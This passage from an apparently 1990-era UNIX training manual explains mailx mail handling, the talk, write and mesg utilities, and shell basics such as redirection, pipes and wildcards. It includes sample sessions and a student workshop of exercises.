- same arguments as before º +º º +º file1 - filename which will receive the saved mail º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ +5.4 Deleting Mail + + +To delete a message, enter a d at the command mode prompt +followed by a msglist argument. An msglist argument can be any +one the following: + + + + n message number n the current message + + ^ the first undeleted message + + $ the last message + + * all messages + + n-m an inclusive range of message numbers + + user all messages from user + + /string All messages with string in the subject line (case + is ignored) + + :c all messages of type c where c is: + + d - deleted messages + n - new messages + o - old messages + r - read messages + u - unread messages + +For example, suppose you wanted to delete all of your mail +messages. Enter the following command at the command mode +prompt. The command mode prompt for mailx is the question mark +(?). + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mailx ³ +³ ³ +³ mailx version 3.1 Type ? for help. ³ +³ "/usr/mail/teacher": 3 messages 3 new ³ +³ >N 1 bhood Fri Jul 13 13:01 21/324 Review session ³ +³ N 2 class2 Fri Jul 13 14:53 15/211 Meeting notice ³ +³ N 3 phajny Fri Jul 13 16:53 11/272 Reorganization ³ +³ ? d * ³ +³ ? q ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +All of the messages have now been deleted. The messages are not +actually deleted until the mailbox is exited. Until that happens +the u (for undelete) command is available. Once the quit command +(q) is entered, however, the deleted messages are gone. +5.5 Undeliverable Mail + + +If there has been an error in the recipient's username, the mail +command will not be able to deliver the message. For example, +let's say you misspelled the username. It will return the mail +in a message that includes the system name and username of the +sender and recipient. It also includes a message stating the +reason for the failure. + +The sender of the message would get a message from mailx +indicating that an error had occurred. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mailx ³ +³ ³ +³ mailx version 3.1 Type ? for help. ³ +³ "/usr/mail/teacher": 1 message 1 new ³ +³ >N 1 teacher Fri Jul 13 13:45 25/655 Returned mail:User unkno³ +³ ? ³ +³ Message 1: ³ +³ From teacher Fri Jul 13 13:45:57 1990 ³ +³ Received: by domax1.UUCP (5.51/) ³ +³ id AA01997; Fri, 13 Jul 90 13:45:54 mdt ³ +³ Date: Fri, 13 Jul 90 13:45:54 mdt ³ +³ From: Mail Delivery Subsystem ³ +³ Subject: Returned mail: User unknown ³ +³ Message-Id: <9007131945.AA01997@domax1.UUCP> ³ +³ To: teacher ³ +³ Status: R ³ +³ ³ +³ ----- Transcript of session follows ----- ³ +³ 550 snoopy... User unknown: No such file or directory ³ +³ ³ +³ ----- Unsent message follows ----- ³ +³ Received: by domax1.UUCP (5.51/) ³ +³ id AA01995; Fri, 13 Jul 90 13:45:54 mdt ³ +³ Date: Fri, 13 Jul 90 13:45:54 mdt ³ +³ From: Teacher Account D-7130 ³ +³ Message-Id: <9007131945.AA01995@domax1.UUCP> ³ +³ To: snoopy ³ +³ Subject: Meeting notice ³ +³ ³ +³ Meeting will be held at Charlie Brown's house. ³ +³ July 13, 1990 ³ +³ 7:30 p.m. ³ +³ ³ +³ ? ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The ? is the mailx command mode prompt. Mailx is asking for +input. + +A list of commands available can be shown by entering a ?. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ? ? ³ +³ mailx commands ³ +³ type [msglist] print messages ³ +³ next goto and type next message ³ +³ edit [msglist] edit messages ³ +³ from [msglist] give header lines of messages ³ +³ delete [msglist] delete messages ³ +³ undelete [msglist] restore deleted messages ³ +³ save [msglist] file append messages to file ³ +³ reply [message] reply to message, including all recipients ³ +³ Reply [msglist] reply to the authors of the messages ³ +³ preserve [msglist] preserve messages in mailbox ³ +³ mail user mail to specific user ³ +³ quit quit, preserving unread messages ³ +³ xit quit, preserving all messages ³ +³ header print page of active message headers ³ +³ ! shell escape ³ +³ cd [directory] chdir to directory or home if none given ³ +³ list list all commands (no explanations) ³ +³ top [msglist] print top 5 lines of messages ³ +³ z [-] display next [last] page of 10 headers ³ +³ ³ +³ [msglist] is optional and specifies messages by number, author, ³ +³ or type. ³ +³ The default is the current message. ³ +³ ? ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This is a partial list of mailx commands available to you. We +will not discuss all of them. If you are interested in the other +features, you can use the on-line manual pages to find out how to +use them. +5.6 Talk Utility + + +Talk is a visual communication program which copies lines from +one terminal to that of another user. This is similar to the +phone utility on VMS. Once communication is established between +two users, they can both type simultaneously with their output +appearing in separate windows. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: talk [ttyname] º +º º +º user1 - If you are talking to someone on the same machine, º +º then this is just the person's username. If º +º you want to talk to a user on another host, then º +º user1 is of the form: º +º º +º host!user or º +º host.user or º +º host:user or º +º user@host º +º º +º user@host being preferred º +º º +º ttyname - If the person you want to talk to is logged on º +º more than once, you can use the ttyname argument º +º to indicate the terminal name. º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +For illustration, let's assume we want to talk with the user +student on the same machine. The command is: + + +Example originator: + +................................................................. +. $talk student . +................................................................. + + +Example recipient: + +................................................................. +. Message from Talk_Daemon@domax1 at 17:36 ... . +. talk: connection requested by teacher@domax1. . +. talk: respond with: talk teacher@domax1 . +................................................................. +When the recipient has typed in talk teacher@domax1, the +following message will appear on the originators screen: + + +Sample Session originator: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ Connection established. ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The screen will be divided in half by a row of dash characters. +The originator will type a message on the top half, and the same +message will appear on the lower half of the screen on the +recipient's screen. + +Likewise, everything the recipient types on the top of his screen +the same message will appear on the bottom of the originators +screen. Once this communication is established, the parties may +type simultaneously with their output appearing in different +windows. While in talk, Ctrl-L will cause the screen to be +reprinted, and the erase and kill characters work as you would +expect. + + +Sample Session originator: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ Hi Snoopy, ³ +³ Charlie Brown suggests we meet at noon today. ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +³-------------------------------------------------------------- ³ +³ OK, but the billiard championship is in my house at 1 P.M. ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +Sample session recipient: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ OK, but the billiard championship is in my house at 1 P.M. ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +³-------------------------------------------------------------- ³ +³ Hi Snoopy, ³ +³ Charlie Brown suggests we meet at noon today. ³ +³ ³ +³ ³ +³ ³ +³ ³ +³ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +When the communication is finished, the interrupt character will +cause the talk utility to exit. + + +Example: + +................................................................. +. [Connection closing. Exiting] . +................................................................. +5.7 Talk Permission Denied + + +If you don't wish to have your work interrupted by a request to +establish a talk connection, you can deny messages. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: mesg [-[n][y]] º +º º +º n - no, forbids messages via write by revoking non-user º +º write permission on the user's terminal. º +º º +º y - yes, reinstates permission º +º º +º º +º mesg with no arguments will report the current state º +º without changing it. º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mesg ³ +³ is y ³ +³ $mesg -n ³ +³ $mesg ³ +³ is n ³ +³ $mesg -y ³ +³ $mesg ³ +³ is y ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The default permission is enabled. Some UNIX commands, however, +disallow messages in order to prevent messy output. +5.8 Write Utility + + +This command will write a message to the screen of another user. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: write [ttyname] º +º º +º user1 - username of the user º +º º +º ttyname - which terminal to send (i.e. tty00) º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session originator: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $write lucy ³ +³ Hello Lucy, ³ +³ What's the latest from the Psychology Department? ³ +³ (interrupt character) ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +Sample Session recipient: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ ³ +³ ³ +³ Message from teacher on domax1 (rt021d0) [ Thu Jul 19 13:43:12 ] .. ³ +³ Hello Lucy, ³ +³ What's the latest from the Psychology Department? ³ +³ ³ +³ ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Here's a suggestion for using write to communicate a little +easier. + +When the user first 'writes' to another user, wait for the +recipient to 'write' back before starting to send. Both users +should agree on a signal to indicate to the other person that +they can reply. How about 'o' for over. The signal 'oo' could +be used for "over and out," which would mean that the +communication is finished. + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +Workshop 5 + + +This workshop will reinforce your understanding of the topics +covered in this chapter. Login to the Multimax with the username +and password given to you by the instructor. Each student is to +complete the entire workshop. Computer exercises might need to +be worked as a team. + +DESK EXERCISES + + +1. What is the command to send an electronic mail message to + another user on the Multimax? + + + + +2. Once you have entered the mail utility what command can you + enter to get help? + + + + +3. What does the command d 5-9 accomplish? + + + + + +4. What is the command to exit the mail utility and return to + the UNIX system prompt? + + + + + +5. What is the mailx command mode prompt? + + + + +6. How would you create a "talk" session to user Student2 on + the host domax0? + + + + +7. What time does the billiard championship start? + + + Continue on the next page + +8. What UNIX command will prevent interruption of your work by + someone wishing to "talk"? + + + + +9. Regarding "write", does the recipient need to be logged in? + + + + + + Regarding "talk", does the recipient need to be logged in? + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Continue on the next page +COMPUTER EXERCISES + + +10. Login to the Multimax. + + + + +11. Send a mail message to another student in the class. + + + + + How can you find out who is logged in? (who?) + + + + + Does the recipient need to be logged in? + + + + + + +12. Send a mail message to username lucy. (lucy does not exist) + + What happened? Why? + + + + + + +13. Read your mail and save one message to the current working + directory. + + + Delete all other mail messages. + + + + + + + + + + + + + Continue on the next page +14. Establish a talk connection with another student. + + + + + +15. What UNIX command do you enter to deny permission for a talk + connection? Try it! + + + + +16. Send a message to another student using the write command. + + How is this different from "talk?" + + + + + +17. Logout of the Multimax and the Annex. + + +6. SHELL BASICS + + +There have been several shells written for UNIX. They have +different features and each is in use through out the world. The +BourneShell is the accepted standard for System V UNIX. Another +shell is called the Cshell, named for "C" which is the high-level +programming language. Another shell is the KornShell; it is +named after the person who developed it, David Korn. It has more +features than the BourneShell and is of special interest to +programmers. + +The purpose of this chapter is to give you some idea as to the +functions available through the shells and their general +function. Details of shell programming are discussed in another +class, "UNIX Bourne Shell Programming". + +UMAX makes full use of the ASCII character set. Unlike operating +system command languages like VMS or NOS, UNIX is case sensitive. +In addition, several characters have special meanings to the +shell. We have already seen that a slash (/) by itself indicates +the root directory and is used with directory, subdirectory, and +filenames to indicate an absolute or relative pathname. + +Other special characters that have meaning to the shell include: + + ` ' $ { } || && ; + +Input to a command is usually taken from your keyboard, and the +output of a command is normally displayed on your monitor screen. +Keyboard input is referred to as "standard input" or "stdin," and +screen output as "standard output" or "stdout." +6.1 Input Redirection + + +It is possible to instruct UNIX to get data from a file rather +than from the keyboard. This is called input redirection. To +indicate that input to a command is to come from a file rather +than the keyboard, use the input redirection character (<). + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: command < input-file1 º +º º +º command - a command º +º º +º input-file1 - input file that supplies input º +º to the command º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +A Memory Trick: The less-than symbol looks like a funnel. If + you pour liquid into the wide end, it flows + to the narrow end. The input-file "pours" + its contents into the command. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mailx phajny < report ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The file named report will be sent to the login name phajny. +Mail normally expects the input to come from standard input, the +keyboard. The input redirection symbol causes the input to mail +to come from the file called report. +6.2 Output Redirection + +It is also possible to instruct UNIX to send data to a file +rather than sending it to the default monitor screen. This is +called output redirection. To indicate that the output from a +command is to go into a file rather than be displayed on the +monitor screen, use the output redirection character >. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: command > output-file1 º +º º +º command - a command º +º º +º output-file1 - output file that will receive the output º +º from the command º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +The memory trick still works; only now the funnel points toward +the file that will receive the output. + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls -l > listing ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The output of the ls command will not be displayed on the screen, +instead it will be in the file named listing. If the file does +not exist, the shell will create it. If it already exists, it +will be overwritten. + +WARNING: The shell will NOT issue a warning about overwriting + the original file. + +It is possible to use the cat command to create a file and input +text into that file using output redirection. The following +example shows how this can be done. + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cat > file1 ³ +³ This is a line of text. ³ +³ This is another line of text. ³ +³ (Ctrl-D) ³ +³ $cat file1 ³ +³ This is a line of text. ³ +³ This is another line of text. ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +6.3 Output Redirection with Append + + +The following shell command will also redirect the output to a +file but instead of overwriting the existing file, it will append +the output to the end of output-file. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: command >> output-file1 º +º º +º command - a command º +º º +º output-file1 - receives the output from command º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Believe it or not, the memory trick still works; only in this +case, one funnel feeds onto another. So the output is fed onto +the end of output-file. Okay, it's a little far fetched; but it +can help you remember. Try it. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls -l subdir >> listing ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This will append the output of the ls command to the file listing +without destroying any existing data. If the file does not +exist, the shell will create it. + +Again, it's possible to append text to the end of an existing +file using the cat command. Note the following example. + + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cat >> file1 ³ +³ This is a third line of text. ³ +³ This is a fourth line of text. ³ +³ (Ctrl-D) ³ +³ $cat file1 ³ +³ This is a line of text. ³ +³ This is another line of text. ³ +³ This is a third line of text. ³ +³ This is a fourth line of text. ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +If the file does not exist it will be created and the text added. + + +6.4 Input and Output Redirection + + +Input and output redirection can occur on the same command line. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: command < input-file1 > output-file1 º +º º +º command - A command º +º input-file1 - supplies input to command º +º output-file1 - receives the output from command º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cat command_file ³ +³ p ³ +³ $mailx < command_file > result_file ³ +³ ³ +³ $cat result_file ³ +³ mailx version 3.1 Type ? for help. ³ +³ "/usr/mail/teacher": 1 message 1 new ³ +³ >N 1 teacher Mon Dec 31 10:16 57/3171 ³ +³ Message 1: ³ +³ From teacher Mon Dec 31 10:16:30 1990 ³ +³ Received: by domax1.UUCP (5.51/) ³ +³ id AA18976; Mon, 31 Dec 90 10:16:28 mst ³ +³ Date: Mon, 31 Dec 90 10:16:28 mst ³ +³ From: Teacher Account D-7130 ³ +³ Message-Id: <9012311716.AA18976@domax1.UUCP> ³ +³ To: teacher ³ +³ Status: R ³ +³ ³ +³ What's Happening ³ +³ by Pam Hajny ³ +³ Denver Office ³ +³ ³ +³ With IRM Training: ³ +³ ³ +³ A Reclamation-wide workshop was held in early October to discuss information ³ +³ resources management training. Trainers from each region and the Denver Offic³ +³ shared training techniques, ideas and course materials. We met one afternoon ³ +³ with the personnel training officers to discuss broad IRM training needs and ³ +. . +. . +. . + +6.5 Pipes + + +The output of a command can be used as the input to a second +command by using the "pipe" symbol (|) without using any +temporary files. On some terminals the pipe symbol is a vertical +bar and on others it is a broken vertical bar. Both will work +exactly the same. The following command format shows how to use +the pipe symbol: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: command1 | command2 º +º º +º command1 - a command º +º º +º command2 - a second command º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Example: + +................................................................. +. $man acct | pg . +................................................................. + +The output from the command man are processed by the pg command +before appearing on your screen. Normally the output from the +man command will appear on the monitor line after line until the +end is reached. In this case, the output is "piped" to the pg +command; and the screen will stop scrolling after 23 lines so you +can read them. +6.6 Wildcards + + +Wildcards are special characters that cause the shell to search +over a range of possible values. + + ? represents any one character, while + + * stands for any number of characters including none. + +Example: + jo?eph + +This indicates that the third letter of the string "jo eph" could +be any single character. Any character could be substituted for +the ? character, including numeric and special characters. + +To limit the range of possible values, enclose the possibilities +in brackets [ ]. + +Example: + jo[a-z]eph + +This example limits the range of characters to the set lowercase +a through lowercase z. Uppercase characters, numeric, or special +characters would not make a match. Notice that only one charater +will make a match. + +Using a comma as a separator between choices we can further +restrict the range. + +Example: + jo[s,m,5]eph + +The only set of characters that will make a match are lowercase +s, lowercase m, and the number 5. No other character will make a +match. + + +The string jos* causes the shell to look for every string that +begins with the letters "jos," regardless of their length while +[i-k]*h finds every string that begins with "i", "j", or "k" and +ends with an "h". + + + + + + + + + +Wildcards are extremely useful in wide variety of applications. +For example, if you want to use the man pages, but do not know +the exact command names on the subject of system accounting, try + +Sample Session: + +................................................................. +. $man acc* . +................................................................. + +All of the commands that begin with the letters acc followed by +any string (including none) will be passed to the man command as +arguments. + + +If you wanted to get a listing of all the files in your current +working directory that ended in .c (these are the C source code +programs). You could enter the following command: + +Sample Session: + +................................................................. +. $ls *.c . +................................................................. +In order for the shell to stop interpretation of a special +character (i.e., use it as a normal character), it must be +preceded by a backslash (\) or enclosed in single quotes. + +Example: + jo\?eph + or + 'jo?eph' + +Both of these examples represent the string jo?eph. The shell +will not interpret the question mark character as a wildcard +metacharacter. + + +6.7 Reestablishing a Background Job + + +Processes in UNIX can run in the foreground or the background. +Foreground processes are interactive; the input is read from the +keyboard or standard in, and the out goes to the monitor screen +or standard out. Background jobs run with no interaction with an +interactive terminal. Your current interactive process can be +suspended by typing the break character at the shell prompt. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ ³ +³ annex: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +The jobs command displays information on all current jobs +(sessions). The most recent job is marked with a plus sign (+), +and the next previous is marked with a dash or minus sign (-). A +job begins when you execute a command to connect to a host (or +another Annex). A job ends when you logout from the host or +terminate the job at the Annex with the kill or hangup command. + +The number of possible jobs allowed per user is determined by the +network administrator. The number of jobs can range from 1 to 16 +with a default of 3. +The Annex command to display the information about the current +job(s) is: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: jobs º 